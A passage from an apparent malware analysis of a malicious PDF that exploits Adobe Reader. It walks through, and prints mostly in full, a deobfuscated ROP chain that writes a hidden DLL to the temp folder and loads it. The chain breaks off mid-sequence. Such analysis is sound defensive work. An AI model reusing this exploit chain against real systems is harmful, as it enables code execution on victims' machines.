A snip of JavaScript code responsible for this is below:

 r+=ue(t+0x51f5fd); pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818001); // data_segment + 0x1
r+=getUnescape(moduleLoadAddr+0x5efb29); // pop ecx/ret
r+=getUnescape(0x54746547); // string
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818005); // data_segment + 0x5
r+=getUnescape(moduleLoadAddr+0x5efb29); // pop ecx/ret
r+=getUnescape(0x50706d65); // string + 0x4
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



These groups of instructions are repeated for each DWORD for the length of the string, incrementing the data_segment and string offsets respectively. The entire string that is copied to the .data segment is:

 0:008> db 63470000 + 1000 + 0x818001 L4e
63c89001 47 65 74 54 65 6d 70 50-61 74 68 41 00 66 77 72 GetTempPathA.fwr
63c89011 69 74 65 00 77 62 00 43-72 79 70 74 53 74 72 69 ite.wb.CryptStri
63c89021 6e 67 54 6f 42 69 6e 61-72 79 41 00 6e 74 64 6c ngToBinaryA.ntdl
63c89031 6c 00 52 74 6c 44 65 63-6f 6d 70 72 65 73 73 42 l.RtlDecompressB
63c89041 75 66 66 65 72 00 77 63-73 73 74 72 00 41 uffer.wcsstr.A




As you can see, the strings for each of the function arguments are present.

Function Calls

The rest of the ROPChain is mostly the same couple of steps repeated:

  1. Prepare arguments for function calls
  2. Call LoadLibraryA()
  3. Call GetProcAddress()
  4. Call function
It performs these steps for the calls to wcsstr(), CryptStringToBinaryA(), RtlDecompressBuffer(), fwrite(), GetTempPathA(), and fclose(). Lets see what one of these calls look like:

Call to wcsstr()

The ultimate goal of the following series of instructions is to set up the stack to make a call to wcsstr(). MSDN shows that the call should look like this:

 wchar_t *wcsstr(
const wchar_t *str,
const wchar_t *strSearch
);



For the *strSearch parameter the author placed a pointer in the JavaScript ROP Chain to the .rdata segment of AcroForm.api which contains the unicode string "Module". Then to determine the *str parameter, the author used the saved stack pointer gathered in the first few instructions of the ROP Chain to calculate the memory address of *strSearch on the stack and place it at the precise offset on the stack where wcsstr() will look for it once called. Really any pointer to a memory address within the ROP Chain could have been used as the *str parameter, since it's at the end of the ROP Chain where the unicode string "Module" was added by the author to indicate the start of the payload. Come to think of it, the author could have probably just calculated the offset to the end of the ROP Chain and skipped the entire wcsstr() call.

Let's see the JavaScript and assembly, This first set of gadgets simply determines the memory address on the stack of the "Module" unicode string in the .rdata segment of AcroForm.api. Remember, esi was used at the start of the ROP chain to store the stack pointer after the pivot.

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(0xcccc0240);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x538c1d); // xchg eax,edi/ret
r+=getUnescape(moduleLoadAddr+0x508c23); // xchg eax,ecx/ret



One note is the use of 0xcccc0240 as the offset. It turns to 0x00000240 after the movsx edi, di. My guess is that the author was trying to avoid nulls within the chain, but if you look at the other areas of the payload, there are tons of nulls used. This implies that the use of nulls is not needed, making it extra, unneeded work by the author. It makes me wonder if it indicates an automatically generated ROP chain or possibly a borrowed chain from another exploit.

At the end of this set of instructions, the memory address on the stack of the pointer to the .rdata"Module resides in ecx.

The next set of instructions determine the offset on the stack where the *str parameter would be. The JavaScript ROP Chain contains 0x41414141 at that offset but the last two sets of instructions overwrite that value with the memory address on the stack of the pointer to the .rdata"Module".

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(0xcccc023c);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); // push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



At this point, the stack is populated with the appropriate parameters at the appropriate places so that the call to wcsstr() can search the memory region where the ROP Chain is for the unicode string of "Module" - which indicates the start of the payload.

However, calling wcsstr() isn't that simple. In the next set of instructions, the author calls LoadLibraryA() to load MSVCR90.dll which is the first step in preparing the module to call the function. The LoadLibrary() function is pretty straight forward to call:

HMODULE WINAPI LoadLibrary(
_In_ LPCTSTR lpFileName
);



With that as a reference, lets look at the ROP Chain:

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); // 65cf2214={kernel32!LoadLibraryA (769d2864)} ; Address to kernel32!LoadLibraryA
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); // ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); // xchg eax,ecx/ret



This is a pretty simple set of instructions, the author loads the address in the import table for LoadLibraryA() into eax then calls it. When LoadLibraryA() looks on the stack for its parameters, it'll see the pointer to the .rdata segment of AcroForm.api which contains to the string "MSVCR90.dll". The return value is a handle to the module set in eax and then immediately copied to ecx.

Next the author has to save the handle at the specific offset on the stack where the next call to GetProcAddress will look for it. This should look familiar, its essentially the same sequence of instructions that the author used to set up the stack for the wcsstr() call (that hasn't happened yet).

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(moduleLoadAddr+0xcccc022c);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); // push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



A call to GetProcAddress() follows, lets see how to call it:

FARPROC WINAPI GetProcAddress(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);



In a similar fashion to the LoadLibraryA() call, the import address for GetProcAddress is loaded into eax and called. The 0x41414141 was overwritten in the previous set of instructions and now contains the handle that was returned from the LoadLibraryA() call, which is used for the hModule parameter. The lpProcName parameter was defined in the setup part of the ROP Chain where the author copied the string to the data segment of AcroForm.api. The address to the precise area of the data segment which contains the "wcsstr" string was already populated in the JavaScript.

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); // Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for ptr to LoadLibrary Handle
r+=getUnescape(moduleLoadAddr+0x818047); // data_segment + 0x47 ("wcsstr")



GetProcAddress will return the address of wcsstr() in eax. The wcsstr() function parameters were already set up earlier on, so all that's left is to call eax. The last line adjusts eax so that it points to the start of the payload, and not at the "Module" delimiter.

r+=getUnescape(moduleLoadAddr+0x154a); // jmp     eax {MSVCR90!wcsstr (7189752c)}
r+=getUnescape(moduleLoadAddr+0x5ec1a0); // pop ecx/pop ecx/ret
r+=getUnescape(0x41414141); // Ptr to stack populated during setup
r+=getUnescape(moduleLoadAddr+0x60a990); // Ptr to unicode "Module" in .data
r+=getUnescape(moduleLoadAddr+0x2df56d); // add eax, 0ch/ret



Prepping and Writing the DLL

Now the ROP Chain has a pointer to the compressed base64 encoded DLL. The rest of the chain decodes (CryptStringToBinaryA), decompresses (RtlDecompressBuffer) and writes the DLL to "C:\Users\user\AppData\Local\Temp\D.T" using the same high level gadgets just described in this section. It uses GetTempPathA() to determine the user's temporary file store, which is where the DLL is saved.

Loading the DLL

With the D.T DLL written to disk, loading is just a matter of calling LoadLibraryA(). The DLL automatically starts it own thread and the remainder of the ROP Chain is just a call to Sleep().

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); // 65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x818101); // Loads D.T as a library
r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f10c0); // ds:0023:65cf20c0={kernel32!SleepStub (769cef66)}
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(0x1010101);



Full ROP Chain

Here's the ROP Chain in its entirety, I manually deobfuscated it and added the assembly annotations.

r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret

r+=getUnescape(moduleLoadAddr+0x41bc90); //push esp/pop esi/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818001); //data_segment + 0x1
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x54746547);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret ;
r+=getUnescape(moduleLoadAddr+0x818005); //scratch_space + 0x5
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x50706d65);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818009); //scratch_space + 0x9
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41687461);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81800d); //scratch_space + 0xd
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41414100);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81800e); //scratch_space + 0xe
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x69727766);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818012); //scratch_space + 0x12
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41006574);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818015); //scratch_space + 0x15
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41006277);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818018); //scratch_space + 0x18
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x70797243);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81801c); //scratch_space + 0x1c
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x72745374);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818020); //scratch_space + 0x20
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x54676e69);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818024); //scratch_space + 0x24
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6e69426f);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818028); //scratch_space + 0x28
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41797261);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81802c); //scratch_space + 0x2c
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41414100);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81802d); //scratch_space + 0x2d
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6c64746e);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818031); //scratch_space + 0x31
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x4141006c);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818033); //scratch_space + 0x33
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x446c7452);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818037); //scratch_space + 0x37
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6d6f6365);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81803b); //scratch_space + 0x3b
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x73657270);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81803f); //scratch_space + 0x3f
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x66754273);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818043); //scratch_space + 0x43
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x726566);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818047); //scratch_space + 0x47
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x73736377);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81804b); //scratch_space + 0x4b
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41007274);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret


r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0240);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x538c1d); //xchg eax,edi/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc023c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); //ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc022c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for ptr to LoadLibrary Handle

r+=getUnescape(moduleLoadAddr+0x818047); //scratch_space + 0x47 ("wcsstr")
r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {MSVCR90!wcsstr (7189752c)}
r+=getUnescape(moduleLoadAddr+0x5ec1a0); //pop ecx/pop ecx/ret
r+=getUnescape(0x41414141); // Placeholder for Ptr to "Module" (unicode)
r+=getUnescape(moduleLoadAddr+0x60a990] // "Module" (unicode)
r+=getUnescape(moduleLoadAddr+0x2df56d); //add eax, 0ch/ret ; Points to after "Module"

r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 0x5e
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ; Copies the start of that string above to the scratchspace
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81804e); //scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x1010101);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x817030); //pointer to "Crypt32.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc02ac);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret; ; Loads the address of "Crypt32.dll" to 4141 below

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for the address of "Crypt32.dll"

r+=getUnescape(moduleLoadAddr+0x818018); //scratch_space + 0x18 // Place holder in scratch space for handle of crypt32 from loadlibrary
r+=getUnescape(moduleLoadAddr+0x57c7ce); //xchg eax,ebp/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 0x5e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc033c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0340);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0344);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret
r+=getUnescape(moduleLoadAddr+0x57c7ce); //xchg eax,ebp/ret ; sets ebp to attacker controlled data

r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {CRYPT32!CryptStringToBinaryA (756e1360)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x41414141); // Placeholder for ptr to base64 above
r+=getUnescape(0x42424242); // Placeholder for zeros above
r+=getUnescape(0x43434343); // place holder for 1 above
r+=getUnescape(moduleLoadAddr+0x818066); //scratch_space + 0x66
r+=getUnescape(moduleLoadAddr+0x81804e); //scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x818056); //scratch_space + 0x56
r+=getUnescape(moduleLoadAddr+0x81805a); //scratch_space + 0x5a

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0428);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ; ecx = 2

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81804e); //; scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0438);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 5e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc042c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
